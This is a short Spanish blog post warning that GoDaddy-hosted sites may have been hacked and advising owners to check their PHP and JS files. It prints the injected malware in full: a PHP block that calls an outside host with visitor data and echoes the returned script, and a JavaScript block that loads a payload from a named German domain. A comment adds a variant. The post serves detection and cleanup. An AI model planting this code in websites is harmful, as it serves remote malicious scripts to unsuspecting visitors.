Posible ataque en GoDaddy

GoDaddy inicialmente es conocida por ofrecer registro de dominios de Internet y alojamiento web a un gran número de clientes de pequeñas empresas que disfrutan de sus servicios y precios. Aunque han tenido algún problema, suelen funcionar bastante bien como housing de páginas web.

Hoy nos llega información que algunos de sus servidores han podido ser hackeados. Si tienes una web alojada en este proveedor de servicios de Interne,t revisa tus archivos PHP y tus archivos JS para ver que no han sido modificados en el servidor y sino arreglarlos por tu FTP.

Pare ser que te meten un enlace a una Web maliciosa finan zzentrum-wuermtal

Estos son los códigos. Si es tu caso limpia los archivos y ponte en contacto con GoDaddy para avisarles para que revisen ese servidor.
<?php
#9dcc9d#
error_reporting(0); ini_set(‘display_errors’,0); $wp_fs0 = @$_SERVER[‘HTTP_USER_AGENT’];
if (( preg_match (‘/Gecko|MSIE/i’, $wp_fs0) && !preg_match (‘/bot/i’, $wp_fs0))){
$wp_fs090=”http://”.”template”.”class”.”.com/class”.”/?ip=”.$_SERVER[‘REMOTE_ADDR’].”&referer=”.urlencode($_SERVER[‘HTTP_HOST’]).”&ua=”.urlencode($wp_fs0);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_fs090);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_0fs = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_0fs,1,3) === ‘scr’ ){ echo $wp_0fs; }
#/9dcc9d#
?>

 

/*a366c2*/
function getCookie(name) { var cookie = ” ” + document.cookie; var search = ” ” + name + “=”; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(“;”, offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
if (navigator.userAgent.indexOf(“MSIE”) != -1){if(navigator.cookieEnabled == true) {var user0 = getCookie(“cscs09″);if (user0 !==”cscs”){setCookie(“cscs09”, “cscs”, 7, “/”); cookiecs09cs();}}} function cookiecs09cs(){document.write(“<script src=’http:// www.finanzzentrum-wuermtal.de/cgi-bin/9hWx7YJ8.php?id=140129855′ type=’text/javascript’></” + “script>”);}
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + “=” + escape(value) + ((expiredays) ? “; expires=” + expires : “”) + ((path) ? “; path=” + path : “”) + ((domain) ? “; domain=” + domain : “”) + ((secure) ? “; secure” : “”);}

/*/a366c2*/

Te interesa

YouTube Rewind 2017: video resumen con los momentos y creadores más virales del año #YoutubeRewind2017

YouTube Rewind 2017: video resumen con los momentos y creadores más virales del año. #YoutubeRewind2017 …

  • jairodsl

    El script cambia mucho en cabecera y URL’s afectadas, por ejemplo:

    /*0c5d2e*/
    function getCookie(name) { var cookie = ” ” + document.cookie; var search = ” ” + name + “=”; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(“;”, offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}

    if (navigator.userAgent.indexOf(“MSIE”) != -1){if(navigator.cookieEnabled == true) {var user77 = getCookie(“dkkbdkkb09″);if (user77 !==”dkkbdkkb”){setCookie(“dkkbdkkb09”, “dkkbdkkb”, 7, “/”); cookiedkkb09dkkb();}}} function cookiedkkb09dkkb(){document.write(“”);}

    function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + “=” + escape(value) + ((expiredays) ? “; expires=” + expires : “”) + ((path) ? “; path=” + path : “”) + ((domain) ? “; domain=” + domain : “”) + ((secure) ? “; secure” : “”);}

    /*/0c5d2e*/

Últimas noticias de Frikipandi.com

Las noticias se actualizan cada 15 minutos.